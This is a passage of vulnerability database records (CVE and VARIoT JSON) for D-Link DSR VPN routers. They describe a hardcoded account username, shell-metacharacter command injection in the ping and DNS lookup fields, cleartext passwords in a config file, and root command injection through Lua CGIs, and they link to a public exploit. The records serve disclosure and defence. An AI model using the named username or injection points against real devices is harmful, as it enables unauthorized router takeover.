              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2013-12-19T01:57:00",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf"
        },
        {
          "name": "30061",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "http://www.exploit-db.com/exploits/30061"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2013-7004",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf",
              "refsource": "MISC",
              "url": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf"
            },
            {
              "name": "30061",
              "refsource": "EXPLOIT-DB",
              "url": "http://www.exploit-db.com/exploits/30061"
            },
            {
              "name": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf",
              "refsource": "MISC",
              "url": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf"
            },
            {
              "name": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf",
              "refsource": "MISC",
              "url": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf"
            },
            {
              "name": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf",
              "refsource": "MISC",
              "url": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2013-7004",
    "datePublished": "2013-12-19T02:00:00",
    "dateReserved": "2013-12-07T00:00:00",
    "dateUpdated": "2024-08-06T17:53:46.023Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2013-5946 (GCVE-0-2013-5946)
Vulnerability from cvelistv5
Published
2013-12-19 02:00
Modified
2024-08-06 17:29
Severity ?
CWE
  • n/a
Summary
The runShellCmd function in systemCheck.htm in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) "Ping or Trace an IP Address" or (2) "Perform a DNS Lookup" section.
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T17:29:42.605Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf"
          },
          {
            "name": "30061",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "http://www.exploit-db.com/exploits/30061"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2013-10-28T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "The runShellCmd function in systemCheck.htm in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) \"Ping or Trace an IP Address\" or (2) \"Perform a DNS Lookup\" section."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2013-12-19T01:57:00",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf"
        },
        {
          "name": "30061",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "http://www.exploit-db.com/exploits/30061"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2013-5946",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The runShellCmd function in systemCheck.htm in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allows remote attackers to execute arbitrary commands via shell metacharacters in the (1) \"Ping or Trace an IP Address\" or (2) \"Perform a DNS Lookup\" section."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf",
              "refsource": "CONFIRM",
              "url": "http://tsd.dlink.com.tw/temp/PMD/12960/DSR-150N_A2_Release_Notes_FW_v1.05B64_WW.pdf"
            },
            {
              "name": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf",
              "refsource": "CONFIRM",
              "url": "http://tsd.dlink.com.tw/temp/PMD/12879/DSR-500_500N_1000_1000N_A1_Release_Notes_FW_v1.08B77_WW.pdf"
            },
            {
              "name": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf",
              "refsource": "CONFIRM",
              "url": "http://tsd.dlink.com.tw/temp/PMD/12966/DSR-150_A1_A2_Release_Notes_FW_v1.08B44_WW.pdf"
            },
            {
              "name": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf",
              "refsource": "CONFIRM",
              "url": "http://tsd.dlink.com.tw/temp/PMD/13039/DSR-250_250N_A1_A2_Release_Notes_FW_v1.08B44_WW_RU.pdf"
            },
            {
              "name": "30061",
              "refsource": "EXPLOIT-DB",
              "url": "http://www.exploit-db.com/exploits/30061"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2013-5946",
    "datePublished": "2013-12-19T02:00:00",
    "dateReserved": "2013-09-27T00:00:00",
    "dateUpdated": "2024-08-06T17:29:42.605Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2013-7005 (GCVE-0-2013-7005)
Vulnerability from cvelistv5
Published
2013-12-19 02:00
Modified
2024-08-06 17:53
Severity ?
CWE
  • n/a
Summary
D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 stores account passwords in cleartext, which allows local users to obtain sensitive information by reading the Users[#]["Password"] fields in /tmp/teamf1.cfg.ascii.
References
http://www.exploit-db.com/exploits/30061 (exploit, x_refsource_EXPLOIT-DB)
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T17:53:46.062Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "30061",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "http://www.exploit-db.com/exploits/30061"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2013-12-06T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 stores account passwords in cleartext, which allows local users to obtain sensitive information by reading the Users[#][\"Password\"] fields in /tmp/teamf1.cfg.ascii."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2013-12-19T01:57:00",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "30061",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "http://www.exploit-db.com/exploits/30061"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2013-7005",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 stores account passwords in cleartext, which allows local users to obtain sensitive information by reading the Users[#][\"Password\"] fields in /tmp/teamf1.cfg.ascii."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "30061",
              "refsource": "EXPLOIT-DB",
              "url": "http://www.exploit-db.com/exploits/30061"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2013-7005",
    "datePublished": "2013-12-19T02:00:00",
    "dateReserved": "2013-12-07T00:00:00",
    "dateUpdated": "2024-08-06T17:53:46.062Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2020-25759 (GCVE-0-2020-25759)
Vulnerability from cvelistv5
Published
2020-12-15 19:28
Modified
2024-08-04 15:40
Severity ?
CWE
  • n/a
Summary
An issue was discovered on D-Link DSR-250 3.17 devices. Certain functionality in the Unified Services Router web interface could allow an authenticated attacker to execute arbitrary commands, due to a lack of validation of inputs provided in multipart HTTP POST requests.
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-04T15:40:36.958Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.dlink.com/en/security-bulletin"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "An issue was discovered on D-Link DSR-250 3.17 devices. Certain functionality in the Unified Services Router web interface could allow an authenticated attacker to execute arbitrary commands, due to a lack of validation of inputs provided in multipart HTTP POST requests."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-12-15T19:28:06",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.dlink.com/en/security-bulletin"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2020-25759",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "An issue was discovered on D-Link DSR-250 3.17 devices. Certain functionality in the Unified Services Router web interface could allow an authenticated attacker to execute arbitrary commands, due to a lack of validation of inputs provided in multipart HTTP POST requests."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.dlink.com/en/security-bulletin",
              "refsource": "MISC",
              "url": "https://www.dlink.com/en/security-bulletin"
            },
            {
              "name": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195",
              "refsource": "MISC",
              "url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10195"
            },
            {
              "name": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/",
              "refsource": "MISC",
              "url": "https://www.digitaldefense.com/news/zero-day-vuln-d-link-vpn-routers/"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2020-25759",
    "datePublished": "2020-12-15T19:28:06",
    "dateReserved": "2020-09-18T00:00:00",
    "dateUpdated": "2024-08-04T15:40:36.958Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

var-202012-0331
Vulnerability from variot

A lack of input validation and access controls in Lua CGIs on D-Link DSR VPN routers may result in arbitrary input being passed to system command APIs, resulting in arbitrary command execution with root privileges. This affects DSR-150, DSR-250, DSR-500, and DSR-1000AC with firmware 3.14 and 3.17. Multiple D-Link routers contain OS command injection and input validation vulnerabilities. Information may be disclosed or tampered with, and the device may be put into a denial-of-service (DoS) state.



{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202012-0331",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dsr-150n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-500ac",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "*"
      },
      {
        "model": "dsr-1000n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-1000ac",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-250n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-250",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-150",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-500",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-1000",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "3.17"
      },
      {
        "model": "dsr-1000",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-500ac",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-150n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-150",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-1000ac",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-250n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-500n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-1000n",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-250",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      },
      {
        "model": "dsr-500",
        "scope": null,
        "trust": 0.8,
        "vendor": "d link",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-25757"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014726"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-150_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.17",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-150:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:dlink:dsr-150_firmware:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "3.17",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:dlink:dsr-150:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": false
              }
            ],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-150n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.17",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-150n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:dlink:dsr-150n_firmware:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "3.17",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:dlink:dsr-150n:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": false
              }
            ],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.17",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-250:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:dlink:dsr-250_firmware:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "3.17",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:dlink:dsr-250:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": false
              }
            ],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-250n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.17",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-250n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:dlink:dsr-250n_firmware:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "3.17",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:dlink:dsr-250n:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": false
              }
            ],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "3.17",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-500:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:dlink:dsr-500_firmware:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndIncluding": "3.17",
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:dlink:dsr-500:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": false
              }
            ],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dlink:dsr-500n:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:o:dlink:dsr-500n_firmware:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:dlink:dsr-500n:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": false
              }
            ],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
